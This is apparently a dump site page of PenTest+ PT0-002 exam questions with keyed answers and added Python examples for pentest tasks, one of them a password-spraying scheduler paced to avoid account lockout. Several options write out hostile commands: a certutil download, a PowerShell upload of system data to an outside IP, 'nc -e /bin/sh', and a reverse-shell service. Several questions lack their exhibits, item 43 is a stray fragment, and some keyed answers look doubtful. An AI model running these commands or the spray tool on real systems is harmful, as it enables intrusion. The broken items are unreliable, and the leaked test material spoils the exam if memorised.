Itfreedumps provides the latest online questions for all IT certifications,
such as IBM, Microsoft, CompTIA, Huawei, and so on. 
Share some PT0-002 exam online questions below. 
1.A penetration tester has gained access to a network device that has a previously unknown IP range
on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Answer: B
Explanation:
The supplier's range is not part of the agreed scope and the supplier has given no authorization, so
scanning it or pivoting through the tunnel would be unauthorized access to a third party's network.
The tester records the tunnel as a finding and raises it with the client through the normal point of
contact; the emergency contact is reserved for events that endanger the client's systems or data.
2.Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext.
B. occurs during the monthly vulnerability scanning.
C. uncovers indicators of prior compromise over the course of the assessment.
D. proceeds in parallel with a criminal digital forensic investigation.
Answer: C
Explanation:
Deconfliction is the process of working out whether observed activity comes from the testers or from
someone else. When the assessment turns up indicators of compromise, the team checks with the client
which artifacts are its own, which belong to sanctioned activity, and which point to a real intrusion
that needs incident response, so the test can continue without contaminating evidence.
3.A client would like to have a penetration test performed that leverages a continuously updated TTPs
framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client's expectations?
A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis
Answer: B
4.A penetration tester discovered that a client uses cloud mail as the company's email system. During
the penetration test, the tester set up a fake cloud mail login page and sent all company employees
an email that stated their inboxes were full and directed them to the fake login page to remedy the
issue.
Which of the following BEST describes this attack?
A. Credential harvesting
B. Privilege escalation
C. Password spraying
D. Domain record abuse
Answer: A
5.A company hired a penetration-testing team to review the cyber-physical systems in a
manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both
connected to the company intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be
valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
Answer: C
6.A penetration tester runs the following command on a system:
find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?
A. Set the SGID on all files in the / directory
B. Find the /root directory on the system
C. Find files with the SUID bit set
D. Find files that were created during exploitation and move them to /dev/null
Answer: C
Explanation:
-user root restricts the search to files owned by root, -perm -4000 matches files with the SUID bit
set, and 2>/dev/null discards standard error so that permission-denied messages from directories the
current user cannot read do not clutter the terminal. SUID root binaries run with root's effective
UID, which makes them the first candidates to examine for local privilege escalation.
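An added Python equivalent of the find command above (example code written for this page, not from the exam or any vendor): it walks a tree, reports regular files whose mode carries the SUID bit, and skips directories it cannot read, which is what 2>/dev/null hides on the command line. The root and the owner filter are parameters so it can be pointed at a scratch directory before being run against /.

```python
import os
import stat
import sys


def find_setuid_files(root, owner_uid=0):
    """Return sorted paths under `root` of regular files with the SUID bit set.

    Equivalent of `find ROOT -user root -perm -4000 -print 2>/dev/null`:
    - owner_uid=0 mirrors `-user root`; pass owner_uid=None to list SUID
      files regardless of owner.
    - directories that cannot be read and files that vanish mid-walk are
      skipped silently, as 2>/dev/null would hide find's error messages.
    """
    hits = []
    # onerror swallows the OSError os.walk raises for unreadable directories
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks, like find
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and FIFOs never carry a meaningful SUID
            if not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def describe(path):
    """Return 'mode owner path' for a hit, e.g. '4755 0 /usr/bin/passwd'."""
    st = os.lstat(path)
    return "%o %d %s" % (stat.S_IMODE(st.st_mode), st.st_uid, path)


if __name__ == "__main__":
    # Usage: python3 find_suid.py [ROOT]   (defaults to /)
    for hit in find_setuid_files(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(describe(hit))
```

Running it as an unprivileged user produces the same list as the find command because reading a file's mode bits only requires search permission on the directory, not read access to the file itself.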
7.Which of the following tools should a penetration tester use to crawl a website and build a wordlist
using the data recovered to crack the password on the website?
A. DirBuster
B. CeWL
C. w3af
D. Patator
Answer: B
Explanation:
CeWL, the Custom Word List Generator, is a Ruby application that allows you to spider a website
based on a URL and depth setting and then generate a wordlist from the files and web pages it finds.
Running CeWL against a target organization’s sites can help generate a custom word list, but you
will typically want to add words manually based on your own OSINT gathering efforts.
https://esgeeks.com/como-utilizar-cewl/
8.A penetration tester conducts an Nmap scan against a target and receives the following results:
Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the
target?
A. Nessus
B. ProxyChains
C. OWASPZAP
D. Empire
Answer: B
Explanation:
Reference: https://www.codeproject.com/Tips/634228/How-to-Use-Proxychains-Forwarding-Ports
9.A customer adds a requirement to the scope of a penetration test that states activities can only
occur during normal business hours.
Which of the following BEST describes why this would be necessary?
A. To meet PCI DSS testing requirements
B. For testing of the customer's SLA with the ISP
C. Because of concerns regarding bandwidth limitations
D. To ensure someone is available if something goes wrong
Answer: D
10.Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. val++
B. +val
C. val=(val+1)
D. ++val
E. val=val++
F. val+=1
Answer: C,F
Explanation:
Python has no ++ or -- operators: val++ and val=val++ are syntax errors, and ++val parses as +(+val),
which evaluates to val without changing it. Only an assignment changes the variable, so val=(val+1)
and the augmented assignment val+=1 are the two correct forms.
https://pythonguides.com/increment-and-decrement-operators-in-python/
11.A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities
in network switches. However, the script is not working properly.
Which of the following changes should the tester apply to make the script work as intended?
A. Change line 2 to $ip= 10.192.168.254;
B. Remove lines 3, 5, and 6.
C. Remove line 6.
D. Move all the lines below line 7 to the top of the script.
Answer: B
Explanation:
https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html
Example script (command-line arguments live in the @ARGV array, starting at index 0):
#!/usr/bin/perl
use strict;
use warnings;
my $ip = $ARGV[0];   # first argument; $argv[1] is an unrelated, undefined variable
attack($ip);
sub attack {
    print("x");
}
12.Which of the following would assist a penetration tester the MOST when evaluating the
susceptibility of top-level executives to social engineering attacks?
A. Scraping social media for personal details
B. Registering domain names that are similar to the target company's
C. Identifying technical contacts at the company
D. Crawling the company's website for company information
Answer: A
13.A security firm has been hired to perform an external penetration test against a company. The only
information the firm received was the company name.
Which of the following passive reconnaissance approaches would be MOST likely to yield positive
initial results?
A. Specially craft and deploy phishing emails to key company leaders.
B. Run a vulnerability scan against the company's external website.
C. Runtime the company's vendor/supply chain.
D. Scrape web presences and social-networking sites.
Answer: D
14.A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Answer: C
Explanation:
The rules of engagement define how the test is allowed to run: permitted testing windows, systems
and techniques that are off limits, and escalation contacts. Cost, liability and report distribution
are contractual items that belong in the MSA or SOW.
15.Which of the following is the MOST effective person to validate results from a penetration test?
A. Third party
B. Team leader
C. Chief Information Officer
D. Client
Answer: B
16.A penetration tester conducted a vulnerability scan against a client's critical servers and found the
following:
Which of the following would be a recommendation for remediation?
A. Deploy a user training program
B. Implement a patch management plan
C. Utilize the secure software development life cycle
D. Configure access controls on each of the servers
Answer: B
17.A penetration-testing team is conducting a physical penetration test to gain entry to a building.
Which of the following is the reason why the penetration testers should carry copies of the
engagement documents with them?
A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. To validate the billing information with the client
D. As proof in case they are discovered
Answer: D
Explanation:
Reference: https://hub.packtpub.com/penetration-testing-rules-of-engagement/
18.Which of the following documents is agreed upon by all parties associated with the penetration-
testing engagement and defines the scope, contacts, costs, duration, and deliverables?
A. SOW
B. SLA
C. MSA
D. NDA
Answer: A
19.Which of the following concepts defines the specific set of steps and approaches that are
conducted during a penetration test?
A. Scope details
B. Findings
C. Methodology
D. Statement of work
Answer: C
20.A penetration tester wants to scan a target network without being detected by the client’s IDS.
Which of the following scans is MOST likely to avoid detection?
A. nmap -p0 -T0 -sS 192.168.1.10
B. nmap -sA -sV --host-timeout 60 192.168.1.10
C. nmap -f --badsum 192.168.1.10
D. nmap -A -n 192.168.1.10
Answer: A
Explanation:
-T0 (paranoid timing) sends one probe at a time with long pauses between them, which keeps the scan
below the rate thresholds most IDS signatures use, and -sS never completes the TCP handshake.
Fragmentation with --badsum sends packets the target discards and is used to detect IDS devices, not
to evade them, and -A runs version and OS detection plus scripts, which is the noisiest option.
Reference: https://www.oreilly.com/library/view/network-security-assessment/9780596510305/ch04.html
21.A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps?
(Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
Answer: D,F
22.A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C
23.A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant.
Which of the following is the MINIMUM frequency to complete the scan of the system?
A. Weekly
B. Monthly
C. Quarterly
D. Annually
Answer: C
Explanation:
https://www.pcicomplianceguide.org/faq/#25
PCI DSS v3.2.1 requires internal and external vulnerability scans at least quarterly and after
significant changes (Requirement 11.2); penetration testing is required at least annually and after
significant changes (Requirement 11.3). The question asks about scanning, so quarterly is the minimum.
24.A penetration tester has been given eight business hours to gain access to a client’s financial
system.
Which of the following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Answer: D
25.A company uses a cloud provider with shared network bandwidth to host a web application on
dedicated servers. The company's contract with the cloud provider prevents any activities that would
interfere with the cloud provider's other customers.
When engaging with a penetration-testing company to test the application, which of the following
should the company avoid?
A. Crawling the web application's URLs looking for vulnerabilities
B. Fingerprinting all the IP addresses of the application's servers
C. Brute forcing the application's passwords
D. Sending many web requests per second to test DDoS protection
Answer: D
26.Which of the following is a rules engine for managing public cloud accounts and resources?
A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite
Answer: A
Explanation:
Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users
to define policies to enable a well managed cloud infrastructure, that's both secure and cost
optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible
tool, with unified metrics and reporting.
27.A penetration tester ran a ping -A command during an unknown environment test, and it returned
a 128 TTL packet.
Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Answer: A
Explanation:
Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/
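An added example (not part of the exam material) that automates the inference: it pulls TTL values out of ping output in either Linux or Windows format, rounds each up to the nearest common default to guess the stack, and reports the hop count implied by the decrement. The 64/128/255 table is an assumption about typical defaults, which administrators can change, so the result is a hint rather than proof; the two transcripts are constructed samples.

```python
import re

# Commonly cited default initial TTLs (an assumption about typical stacks; the
# value is tunable, so treat the guess as a hint to be confirmed by other means).
DEFAULT_TTLS = (
    (64, "Linux/Unix-like (also macOS, Android)"),
    (128, "Windows"),
    (255, "Network device or Solaris"),
)

# Matches both Linux ("ttl=128") and Windows ("TTL=128") reply lines.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)

# Constructed sample transcripts, not real captures.
LINUX_PING = """PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=1 ttl=128 time=0.412 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=128 time=0.398 ms
"""
WINDOWS_PING = """Reply from 10.0.5.7: bytes=32 time=12ms TTL=54
Reply from 10.0.5.7: bytes=32 time=11ms TTL=54
"""


def infer_os(observed_ttl):
    """Return (os_guess, estimated_hops) for a TTL seen in an ICMP echo reply.

    Every router decrements TTL by one, so the observed value is rounded up to
    the nearest default; the difference is the number of hops to the target.
    """
    for initial, name in DEFAULT_TTLS:
        if observed_ttl <= initial:
            return name, initial - observed_ttl
    return "unknown", None


def ttls_from_ping(output):
    """Extract every TTL value from raw ping output."""
    return [int(t) for t in TTL_RE.findall(output)]


def fingerprint(output):
    """Collapse a ping transcript into one (os_guess, hops) result, or None."""
    ttls = ttls_from_ping(output)
    if not ttls:
        return None
    # Use the largest value: if replies took different paths it is the one
    # with the fewest hops, and all of them round to the same default anyway.
    return infer_os(max(ttls))


if __name__ == "__main__":
    print(fingerprint(LINUX_PING))    # target answered with TTL 128 -> Windows, 0 hops
    print(fingerprint(WINDOWS_PING))  # TTL 54 -> Linux/Unix-like, 10 hops away
```

A reply of 128 from a host on the same subnet means zero decrements, which is the situation in the question; the same host seen from ten routers away would show 118, and rounding up is what keeps the guess stable.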
28.A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false
positives and increases the true positives of the results.
Which of the following would MOST likely accomplish this goal?
A. Using OpenVAS in default mode
B. Using Nessus with credentials
C. Using Nmap as the root user
D. Using OWASP ZAP
Answer: B
Explanation:
Using credentials during a vulnerability scan allows the scanner to gather more detailed information
about the target system, including installed software, patch levels, and configuration settings. This
helps to reduce the likelihood of false positives and increase the true positives of the results. Nessus
is a popular vulnerability scanner that supports credential-based scanning and can be used to
accomplish this goal. OpenVAS and Nmap are also popular scanning tools, but using default mode or
running as the root user alone may not provide the necessary level of detail for accurate vulnerability
identification. OWASP ZAP is a web application scanner and may not be applicable for non-web-based
targets.
29.After gaining access to a previous system, a penetration tester runs an Nmap scan against a
network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
A. The tester input the incorrect IP address.
B. The command requires the -port 135 option.
C. An account for RDP does not exist on the server.
D. PowerShell requires administrative privilege.
Answer: C
30.A penetration tester was able to compromise a server and escalate privileges.
Which of the following should the tester perform AFTER concluding the activities on the specified
target? (Choose two.)
A. Remove the logs from the server.
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.
Answer: D,E
31.A penetration tester wants to find hidden information in documents available on the web at a
particular domain.
Which of the following should the penetration tester use?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
Answer: D
Explanation:
https://kalilinuxtutorials.com/foca-metadata-hidden-documents/
32.A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a
Linux server and discovers the following data in a file named password.txt in the /home/svsacct
directory:
U3VQZXIkM2NyZXQhCg==
Which of the following commands should the tester use NEXT to decode the contents of the file?
A. echo U3VQZXIkM2NyZXQhCg== | base64 -d
B. tar zxvf password.txt
C. hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D. john --wordlist /usr/share/seclists/rockyou.txt password.txt
Answer: A
Explanation:
The restricted character set and the trailing == padding mark the value as Base64, not a password
hash, so it is decoded rather than cracked; the decoded text is a plaintext credential.
33.A penetration tester has obtained a low-privilege shell on a Windows server with a default
configuration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester START this process?
A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php',
'systeminfo.txt')
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Answer: A
Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-
malware-while-bypassing-av/
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
34.A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot.
Which of the following techniques would BEST support this objective?
A. Create a one-shot system service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
C. Run the nc -e /bin/sh <...> command.
D. Move laterally to create a user account on LDAP
Answer: A
Explanation:
https://hosakacorp.net/p/systemd-user.html
35.During a penetration test, a tester is able to change values in the URL from
example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application.
Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
Answer: C
Explanation:
Insecure direct object reference (IDOR) is a vulnerability where the developer of the application does
not implement authorization features to verify that someone accessing data on the site is allowed to
access that data.
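As an added illustration that is not from the exam, the vulnerable lookup next to two server-side fixes. RECORDS, the user names and the balances are constructed sample data; the point is that load_record_vulnerable trusts the id from the URL, load_record_fixed keeps the direct id but enforces ownership, and ReferenceMap replaces the id with an opaque per-session token so there is nothing meaningful to tamper with.

```python
import secrets

# Constructed sample data: two users' records keyed by the integer id that
# appears in the URL (login.php?id=5 / ?id=10 in the question).
RECORDS = {
    5: {"owner": "alice", "balance": 120},
    10: {"owner": "bob", "balance": 9800},
}


class Forbidden(Exception):
    """Raised when the caller may not access the requested object."""


def load_record_vulnerable(session_user, record_id):
    """IDOR: trusts the client-supplied id and never checks who owns it."""
    return RECORDS[record_id]


def load_record_fixed(session_user, record_id):
    """Authorize on the server: the id is still direct, but ownership is enforced.

    Missing and foreign ids both raise Forbidden so that the error response
    cannot be used to enumerate which ids exist.
    """
    record = RECORDS.get(record_id)
    if record is None or record["owner"] != session_user:
        raise Forbidden("no access to record %r" % record_id)
    return record


class ReferenceMap:
    """Indirect references: give the client opaque per-session tokens, not ids.

    The browser only ever sees the token; the mapping back to the real id
    lives server-side, so editing the URL yields nothing that can be looked up.
    """

    def __init__(self, session_user):
        self.user = session_user
        self.tokens = {}
        for rid, rec in RECORDS.items():
            if rec["owner"] == session_user:
                self.tokens[secrets.token_urlsafe(16)] = rid

    def resolve(self, token):
        if token not in self.tokens:
            raise Forbidden("unknown reference")
        # Defence in depth: re-check ownership even though the map is per user.
        return load_record_fixed(self.user, self.tokens[token])


if __name__ == "__main__":
    print(load_record_vulnerable("alice", 10))  # alice reads bob's record: the flaw
    try:
        load_record_fixed("alice", 10)
    except Forbidden as exc:
        print("fixed:", exc)
    refs = ReferenceMap("alice")
    for token in refs.tokens:
        print(token, "->", refs.resolve(token))
```

The ownership check is the fix that matters; the reference map is an extra layer that also stops id guessing, but it must never replace the check, because a token leaked from one session would otherwise be accepted in another.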
36.A physical penetration tester needs to get inside an organization's office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company's ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom.
Which of the following techniques can the tester use to gain physical access to the office? (Choose
two.)
A. Shoulder surfing
B. Call spoofing
C. Badge stealing
D. Tailgating
E. Dumpster diving
F. Email phishing
Answer: C,D
37.A penetration tester is trying to restrict searches on Google to a specific domain.
Which of the following commands should the penetration tester consider?
A. inurl:
B. link:
C. site:
D. intitle:
Answer: C
38.During an engagement, a penetration tester found the following list of strings inside a file:
Which of the following is the BEST technique to determine the known plaintext of the strings?
A. Dictionary attack
B. Rainbow table attack
C. Brute-force attack
D. Credential-stuffing attack
Answer: B
39.During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the
target company's website and then creates a list of possible usernames based on the email address
format.
Which of the following types of attacks would MOST likely be used to avoid account lockout?
A. Mask
B. Rainbow
C. Dictionary
D. Password spraying
Answer: D
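An added example (written for this page, not from the exam) of the pacing a spray needs so that account lockout is never tripped, together with the username derivation the question mentions. The lockout threshold and window are assumed inputs, obtained from the client's password policy or from OSINT, and the username formats are assumptions about common corporate naming conventions. The code only plans and checks the schedule; it sends no requests.

```python
from collections import deque


def username_candidates(email):
    """Derive likely login names from an address in first.last@domain form.

    The variants are assumptions about common naming conventions; extend the
    list with whatever format reconnaissance shows the target actually uses.
    """
    local = email.split("@", 1)[0].lower()
    if "." not in local:
        return [local]
    first, last = local.split(".", 1)
    return [local, first[0] + last, first + last[0], first + "_" + last]


def plan_spray(usernames, passwords, lockout_threshold, lockout_window_s, margin_s=60):
    """Return [(offset_s, username, password), ...] in execution order.

    One password is tried against every account before moving to the next
    (the spray), and rounds are paced so that no account accrues more than
    lockout_threshold - 1 failures inside any lockout_window_s window.
    margin_s is added to each wait so clock skew on the target cannot pull an
    old attempt back inside the window.
    """
    safe_per_window = lockout_threshold - 1
    if safe_per_window < 1:
        raise ValueError("a lockout threshold of 1 leaves no safe attempts")
    round_starts = deque()  # offsets of the rounds still inside the window
    now = 0.0
    schedule = []
    for password in passwords:
        if len(round_starts) == safe_per_window:
            oldest = round_starts.popleft()
            now = max(now, oldest + lockout_window_s + margin_s)
        round_starts.append(now)
        schedule.extend((now, user, password) for user in usernames)
    return schedule


def max_failures_in_window(schedule, lockout_window_s):
    """Worst-case attempts any one user sees in a window (assumes all fail).

    The window is treated as half-open: an attempt exactly lockout_window_s
    seconds old has aged out, which is why plan_spray adds a margin.
    """
    per_user = {}
    for offset, user, _pw in schedule:
        per_user.setdefault(user, []).append(offset)
    worst = 0
    for offsets in per_user.values():
        offsets.sort()
        for i, t in enumerate(offsets):
            in_window = sum(1 for u in offsets[: i + 1] if u > t - lockout_window_s)
            worst = max(worst, in_window)
    return worst


if __name__ == "__main__":
    users = [u for e in ("Jane.Doe@example.com", "Al.Smith@example.com")
             for u in username_candidates(e)]
    plan = plan_spray(users, ["Winter2023!", "Spring2024!", "Welcome1"],
                      lockout_threshold=3, lockout_window_s=1800)
    for offset, user, password in plan:
        print("%6.0f s  %-10s %s" % (offset, user, password))
    print("worst case per user:", max_failures_in_window(plan, 1800))
```

With a threshold of three failures in thirty minutes, two rounds run back to back and the third waits until the first has aged out; a dictionary attack against one account would hit the threshold on its third guess.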
40.During an assessment, a penetration tester was able to access the organization's wireless network
from outside of the building using a laptop running Aircrack-ng.
Which of the following should be recommended to the client to remediate this issue?
A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi
Answer: A
41.A penetration tester is examining a Class C network to identify active systems quickly.
Which of the following commands should the penetration tester use?
A. nmap -sn 192.168.0.1/16
B. nmap -sn 192.168.0.1-254
C. nmap -sn 192.168.0.1 192.168.0.1.254
D. nmap -sN 192.168.0.0/24
Answer: B
42.A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration
tester?
A. index.html
B. about
C. info
D. home.html
Answer: B
Explanation:
home.html, index.html and info all return exactly 214 bytes, which almost always means one generic
placeholder page is being served under several names; about is the only response with distinct
content.
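An added example, not from the exam, that parses the dirb output above and ranks hits by how unusual their response shape is: several paths returning the same status and byte length are treated as one placeholder page. The sample is the scan output from the question, embedded as a constructed string.

```python
import re
from collections import Counter

# Constructed sample, copied from the scan result in the question above.
DIRB_OUTPUT = """\
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
DOWNLOADED: 4612 - FOUND: 4
"""

# dirb prints one '+ URL (CODE:nnn|SIZE:nnn)' line per discovered path
HIT_RE = re.compile(r"^\+\s+(\S+)\s+\(CODE:(\d+)\|SIZE:(\d+)\)")


def parse_dirb(output):
    """Return [(url, status, size), ...] for every '+' hit line in dirb output."""
    hits = []
    for line in output.splitlines():
        m = HIT_RE.match(line.strip())
        if m:
            hits.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return hits


def rank_hits(hits):
    """Order hits so the ones most likely to hold distinct content come first.

    Several paths returning the same status with byte-identical length are
    almost always one generic page (a placeholder index, a soft-404 or a
    catch-all rewrite) served under different names; a response whose size is
    unique among the results is worth reading first. Ties keep URL order.
    """
    shape_counts = Counter((status, size) for _url, status, size in hits)
    return sorted(hits, key=lambda h: (shape_counts[(h[1], h[2])], -h[2], h[0]))


def likely_placeholder_sizes(hits, min_repeats=2):
    """Sizes that repeat min_repeats+ times for one status: candidates to filter out."""
    shape_counts = Counter((status, size) for _url, status, size in hits)
    return sorted(size for (_status, size), n in shape_counts.items() if n >= min_repeats)


if __name__ == "__main__":
    hits = parse_dirb(DIRB_OUTPUT)
    print("placeholder sizes:", likely_placeholder_sizes(hits))
    for url, status, size in rank_hits(hits):
        print("%3d %6d %s" % (status, size, url))
```

The same grouping is the manual step a tester does by eye on a short list; on a scan with hundreds of hits, feeding the repeated sizes back into the scanner as exclusions is what keeps the result readable.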
43. URL redirect - prevent external calls
44.An exploit developer is coding a script that submits a very large number of small requests to a web
server until the server is compromised. The script must examine each response received and
compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string comparison
and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array
Answer: C
Explanation:
The script needs to test each response against a large set of known strings and branch on which one
matches. A dictionary (hash table) keyed by those strings gives average constant-time lookup, whereas
a list or array must be scanned element by element and a tree costs a logarithmic number of
comparisons per lookup, so the dictionary makes the matching step the cheapest.